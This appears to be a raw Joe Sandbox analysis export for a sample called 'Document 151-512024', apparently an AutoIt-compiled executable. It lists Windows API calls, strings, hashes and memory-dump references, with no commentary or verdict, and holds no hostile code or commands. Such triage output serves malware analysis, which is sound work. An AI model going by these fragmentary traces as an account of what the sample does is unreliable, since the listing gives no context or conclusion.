                                                                                                    • Instruction ID: 78d8bd83dac038fed33af35d8294d4ad5de996fc98ee51857885946eb6b6f6c9
                                                                                                    • Opcode Fuzzy Hash: db0389bc83cf486073273f8d5591cd2b379e5f2516621d483892ac4593fe64f5
                                                                                                    • Instruction Fuzzy Hash: C02160B5645209AFDB10DF64DCC1DB737ADEB8A3A4B44445AFA009B391CB31EC51CA60
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009D3840
                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009D3850
                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009D3876
                                                                                                    Strings
                                                                                                    • _____________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{, xrefs: 009D37C7
                                                                                                    • Listbox, xrefs: 009D380F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                    • String ID: Listbox$_____________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstyzzzzzzzzzzzzzzzz{{{{{{
                                                                                                    • API String ID: 3315199576-2916758532
                                                                                                    • Opcode ID: 9d182435eb2b8230ac331f436b637dcaee5760b166cceba86d275cbcd4212f8f
                                                                                                    • Instruction ID: 60d0eedaf7a7b9baf038f2a28da0dcbb258becaede67e44ba4193e5339f80e5b
                                                                                                    • Opcode Fuzzy Hash: 9d182435eb2b8230ac331f436b637dcaee5760b166cceba86d275cbcd4212f8f
                                                                                                    • Instruction Fuzzy Hash: 8A21C272650119BBEF118F54DC85FBB376EEF89754F10C115F9009B290CA71DC5297A0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                    • GetCursorPos.USER32(?), ref: 009D9001
                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00997711,?,?,?,?,?), ref: 009D9016
                                                                                                    • GetCursorPos.USER32(?), ref: 009D905E
                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00997711,?,?,?), ref: 009D9094
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 2864067406-3368625520
                                                                                                    • Opcode ID: ff8a5f5c0f9b200b037911382f09e8d7b5705e44244cf4e66d2c07df47b2cf63
                                                                                                    • Instruction ID: 880285031008f0bae505918ea34ae876cb8daf3d51c2a4ba5dd2f59c82996a49
                                                                                                    • Opcode Fuzzy Hash: ff8a5f5c0f9b200b037911382f09e8d7b5705e44244cf4e66d2c07df47b2cf63
                                                                                                    • Instruction Fuzzy Hash: 7121D135601018EFDB25EF94EC58EFA3BB9EF89351F04C156F90587261C3359990EB60
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009D2F8D
                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 009D2F94
                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009D2FA9
                                                                                                    • DestroyWindow.USER32(?), ref: 009D2FB1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                    • String ID: SysAnimate32
                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                    • Opcode ID: 1fb9812c104a32af344de2f89ee7c99ca0de7528070435776e64f45b7d8c66d8
                                                                                                    • Instruction ID: a29eb7795bb10b432609a40bf33c5ff8f3898cfb46fb811134cef100bd902d16
                                                                                                    • Opcode Fuzzy Hash: 1fb9812c104a32af344de2f89ee7c99ca0de7528070435776e64f45b7d8c66d8
                                                                                                    • Instruction Fuzzy Hash: 6C21C071254205AFEB104FA8DC80FBB37BDEF69364F108A1AFA50D2290D771DC91A760
                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00964D1E,009728E9,?,00964CBE,009728E9,00A088B8,0000000C,00964E15,009728E9,00000002), ref: 00964D8D
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00964DA0
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00964D1E,009728E9,?,00964CBE,009728E9,00A088B8,0000000C,00964E15,009728E9,00000002,00000000), ref: 00964DC3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 4d37c8f19f6a443f2438b0fddd22ae22e485289646254ba85d39bcb0736af562
                                                                                                    • Instruction ID: 6d2da0070b2ddec187b671a429e2022838ad00e76a22c5592bb7358729a14a3c
                                                                                                    • Opcode Fuzzy Hash: 4d37c8f19f6a443f2438b0fddd22ae22e485289646254ba85d39bcb0736af562
                                                                                                    • Instruction Fuzzy Hash: F7F0C270A95219FBDB119FD0DC49BAEBFB8EF84751F0001A5F805A22A0CF716D80DB90
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00944EDD,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E9C
                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00944EAE
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00944EDD,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944EC0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-3689287502
                                                                                                    • Opcode ID: 7441ed6edf19ccdb5bd15df199c57149a21167f9a4233e0bdc41d15e415ff911
                                                                                                    • Instruction ID: d610d9bfeeb912841599b36fc4b5e102808d16fdbcc87f94067ecc18fd2ea933
                                                                                                    • Opcode Fuzzy Hash: 7441ed6edf19ccdb5bd15df199c57149a21167f9a4233e0bdc41d15e415ff911
                                                                                                    • Instruction Fuzzy Hash: 70E08C76A9A633ABD3221B25AC2CF6B665CAF81B62B050116FC00E2250DF64CD42D0A0
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00983CDE,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E62
                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00944E74
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00983CDE,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E87
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-1355242751
                                                                                                    • Opcode ID: 67e99f31e5a5f056141bb230964c251a97958fb9339f5148ae65e74bdf00b57e
                                                                                                    • Instruction ID: 56bc85364b21d2ca79f34ac87456d27d6acf4c6cbc36f8ccc48a496483c1a4ca
                                                                                                    • Opcode Fuzzy Hash: 67e99f31e5a5f056141bb230964c251a97958fb9339f5148ae65e74bdf00b57e
                                                                                                    • Instruction Fuzzy Hash: DDD0C23255B633678A221B247C08E8B6B1CAF81B113050613B801E3150CF20CD41D1D1
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 009CA427
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009CA435
                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009CA468
                                                                                                    • CloseHandle.KERNEL32(?), ref: 009CA63D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3488606520-0
                                                                                                    • Opcode ID: 423076d617df01a9100b75550c4d54cf41f38175f80d47c9b5372f70627f1de4
                                                                                                    • Instruction ID: 11a7db507d1b4370dd5b282cdb192c7ac3bff5014a8f96f1d3ebb407992e6abb
                                                                                                    • Opcode Fuzzy Hash: 423076d617df01a9100b75550c4d54cf41f38175f80d47c9b5372f70627f1de4
                                                                                                    • Instruction Fuzzy Hash: 52A1BFB1A043019FD720DF24C886F2AB7E5AF84714F14895DF99A9B392D7B0EC45CB92
                                                                                                    APIs
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009E3700), ref: 0097BB91
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00A1121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0097BC09
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00A11270,000000FF,?,0000003F,00000000,?), ref: 0097BC36
                                                                                                    • _free.LIBCMT ref: 0097BB7F
                                                                                                      • Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
                                                                                                      • Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0
                                                                                                    • _free.LIBCMT ref: 0097BD4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 1286116820-0
                                                                                                    • Opcode ID: 76666acb215eceb7829208de76bfdd8360c5365a91d2e3f910f5461db06aa2f8
                                                                                                    • Instruction ID: 13a30b13830e86e87e9e70b91288dae11f7dfd822ec85f0d9039adda1240ad59
                                                                                                    • Opcode Fuzzy Hash: 76666acb215eceb7829208de76bfdd8360c5365a91d2e3f910f5461db06aa2f8
                                                                                                    • Instruction Fuzzy Hash: 7851B773904209AFCB11EFA99C81BEEB7BCEF81350B14C66AE558D7191EB705D418B50
                                                                                                    APIs
                                                                                                      • Part of subcall function 009ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ACF22,?), ref: 009ADDFD
                                                                                                      • Part of subcall function 009ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ACF22,?), ref: 009ADE16
                                                                                                      • Part of subcall function 009AE199: GetFileAttributesW.KERNEL32(?,009ACF95), ref: 009AE19A
                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 009AE473
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 009AE4AC
                                                                                                    • _wcslen.LIBCMT ref: 009AE5EB
                                                                                                    • _wcslen.LIBCMT ref: 009AE603
                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 009AE650
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3183298772-0
                                                                                                    • Opcode ID: 302e138dc43a8bd54d6fec28596098299b0de0fe1183889f3645e6d0de364fd4
                                                                                                    • Instruction ID: 69664d0eb75a63a5f34c811db7d2481cad658c80b33fbf3c9704bbd33686c33c
                                                                                                    • Opcode Fuzzy Hash: 302e138dc43a8bd54d6fec28596098299b0de0fe1183889f3645e6d0de364fd4
                                                                                                    • Instruction Fuzzy Hash: 545153B24083455BC724DB94DC85ADBB3ECAFC5344F00491EF589D3191EF74A688C7A6
                                                                                                    APIs
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                      • Part of subcall function 009CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009CB6AE,?,?), ref: 009CC9B5
                                                                                                      • Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CC9F1
                                                                                                      • Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA68
                                                                                                      • Part of subcall function 009CC998: _wcslen.LIBCMT ref: 009CCA9E
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009CBAA5
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009CBB00
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009CBB63
                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 009CBBA6
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 009CBBB3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                    • String ID:
                                                                                                    • API String ID: 826366716-0
                                                                                                    • Opcode ID: 00fefee292b5ed54d0b55581a62b644efffad4f78750b3f4187fc77e010ea450
                                                                                                    • Instruction ID: 8d1982e2ca3d517bf4a187e8ef2647e7178f44607ec959fbe68b574baa40c3a0
                                                                                                    • Opcode Fuzzy Hash: 00fefee292b5ed54d0b55581a62b644efffad4f78750b3f4187fc77e010ea450
                                                                                                    • Instruction Fuzzy Hash: C361AF71608241AFD714DF24C491F2ABBE9FF84348F14895DF49A8B2A2DB31ED45CB92
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 009A8BCD
                                                                                                    • VariantClear.OLEAUT32 ref: 009A8C3E
                                                                                                    • VariantClear.OLEAUT32 ref: 009A8C9D
                                                                                                    • VariantClear.OLEAUT32(?), ref: 009A8D10
                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009A8D3B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                    • String ID:
                                                                                                    • API String ID: 4136290138-0
                                                                                                    • Opcode ID: 6ae1cc90387d6085437c272f7c4d1db1600335298f9458f77d555bc35d4c3eab
                                                                                                    • Instruction ID: c49976944752f9cc8253c37e8c0485dcb2bda1a06c57e9f1329b73ab88880789
                                                                                                    • Opcode Fuzzy Hash: 6ae1cc90387d6085437c272f7c4d1db1600335298f9458f77d555bc35d4c3eab
                                                                                                    • Instruction Fuzzy Hash: EC516BB5A1021AEFCB14CF68C894AAAB7F9FF89310B158559F909DB350E734E911CF90
                                                                                                    APIs
                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009B8BAE
                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 009B8BDA
                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009B8C32
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009B8C57
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009B8C5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                    • String ID:
                                                                                                    • API String ID: 2832842796-0
                                                                                                    • Opcode ID: 5d10850768d05d1e552344bbf6b7bb0316b3614755b25f7cebf443a6494c5870
                                                                                                    • Instruction ID: 21ac32e29e78231b7ea14452f8a5820b7fe70ba0ea40bbbd319c1601e25e6fe7
                                                                                                    • Opcode Fuzzy Hash: 5d10850768d05d1e552344bbf6b7bb0316b3614755b25f7cebf443a6494c5870
                                                                                                    • Instruction Fuzzy Hash: 14515C75A002199FCB00DF64C881EAEBBF5FF48314F088459E949AB362CB35ED41CB90
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 009C8F40
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 009C8FD0
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009C8FEC
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 009C9032
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 009C9052
                                                                                                      • Part of subcall function 0095F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,009B1043,?,761DE610), ref: 0095F6E6
                                                                                                      • Part of subcall function 0095F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0099FA64,00000000,00000000,?,?,009B1043,?,761DE610,?,0099FA64), ref: 0095F70D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 666041331-0
                                                                                                    • Opcode ID: f93d8462571cea77b072e35e551728114e5318488db619ee6da2ecc9919ce890
                                                                                                    • Instruction ID: 0311a49f0d2ec70c3c946aa351a5410a2d1f6590e14f4a86a2714ffbf7e8635c
                                                                                                    • Opcode Fuzzy Hash: f93d8462571cea77b072e35e551728114e5318488db619ee6da2ecc9919ce890
                                                                                                    • Instruction Fuzzy Hash: 85512A35A05205DFC711DF58C494EAEBBF5FF49314B0480A9E80AAB362DB31ED86CB91
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
